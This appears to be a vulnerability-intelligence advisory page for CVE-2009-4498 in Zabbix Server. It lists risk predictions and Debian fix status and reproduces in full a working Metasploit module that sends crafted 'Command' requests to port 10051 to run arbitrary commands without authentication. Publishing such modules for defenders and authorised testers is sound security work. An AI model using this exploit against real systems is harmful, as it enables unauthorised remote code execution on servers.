VIR Vulnerability Intelligence Relay

CVE-2009-4498

unknown
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

The node_process_command function in Zabbix Server before 1.8 allows remote attackers to execute arbitrary commands via a crafted request.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-10432 webapps multiple verified
Nicob · 2009-12-14

Zabbix Server - Multiple Vulnerabilities

Source code queued for fetch — refresh in a moment.
EDB-20796 remote linux verified ruby · 4 KB
Metasploit · 2012-08-27

Zabbix Server - Arbitrary Command Execution (Metasploit)

ruby exploit Source: Exploit-DB 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Zabbix Server Arbitrary Command Execution',
			'Description'    => %q{
					This module abuses the "Command" trap in Zabbix Server to execute arbitrary
				commands without authentication. By default the Node ID "0" is used, if it doesn't
				work, the Node ID is leaked from the error message and exploitation retried.

				According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability
				has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.
			},
			'Author'         =>
				[
					'Nicob <nicob[at]nicob.net>', # Vulnerability discovery
					'juan vazquez' # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2009-4498' ],
					[ 'OSVDB', '60965' ],
					[ 'BID', '37989' ],
					[ 'EDB', '10432' ],
					[ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic telnet',
							# *_perl, *_python and *_ruby work if they are installed
						}
				},
			'Targets'        =>
				[
					[ 'Zabbix 1.6.7', { } ]
				],
			'DefaultTarget' => 0,
			'DisclosureDate'  => 'Sep 10 2009'
		))

		register_options(
			[
				Opt::RPORT(10051),
			], self.class)
	end

	def send_command(sock, node_id, cmd)
		host_id = Rex::Text.rand_text_numeric(3)
		msg = "Command\255"
		msg << "#{node_id}\255"
		msg << "#{host_id}\255"
		msg << "#{cmd}\n"
		sock.put(msg)
		res = sock.get_once
		return res
	end

	def check
		peer = "#{rhost}:#{rport}"
		node_id = 0
		clue = Rex::Text.rand_text_alpha(rand(5)+5)
		cmd = "echo #{clue}"

		connect
		print_status("#{peer} - Sending 'Command' request...")
		res = send_command(sock, node_id, cmd)
		disconnect

		if res
			print_status(res)
			if res =~ /#{clue}/
				return Exploit::CheckCode::Vulnerable
			elsif res =~ /-1/ and res=~ /NODE (\d*)/
				node_id = $1
				print_good("#{peer} - Node ID #{node_id} discovered")
			else
				return Exploit::CheckCode::Safe
			end
		else # No response
			return Exploit::CheckCode::Safe
		end

		# Retry with the good node_id
		connect
		print_status("#{peer} - Sending 'Command' request with discovered Node ID...")
		res = send_command(sock, node_id, cmd)
		disconnect
		if res and res =~ /#{clue}/
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		peer = "#{rhost}:#{rport}"
		node_id = 0
		cmd = payload.encoded

		connect
		print_status("#{peer} - Sending 'Command' request...")
		res = send_command(sock, node_id, cmd)
		disconnect

		if res and res =~ /-1/ and res=~ /NODE (\d*)/
			# Retry with the good node_id
			node_id = $1
			print_good("#{peer} - Node ID #{node_id} discovered")
			connect
			print_status("#{peer} - Sending 'Command' request with discovered Node ID...")
			res = send_command(sock, node_id, cmd)
			disconnect
		end

		# Read command output from socket if cmd/unix/generic payload was used
		if (datastore['CMD'])
			if res and res =~ /\x30\xad/
				print_good("#{peer} - Command executed successfully")
				print_status("Output:\n#{res.split("\x30\xad").last}")
			else
				print_error("#{peer} - Failed to execute the command")
			end
		end

	end

end

Metasploit modules

exploit_linux/misc/zabbix_server_exec rank 600
Zabbix Server Arbitrary Command Execution
Source fetch failed: fetch_error — view the original via the link above.

OS impact
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 1:1.8-1
sid Fixed 1:1.8-1
forky Fixed 1:1.8-1
bullseye Fixed 1:1.8-1
bookworm Fixed 1:1.8-1

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.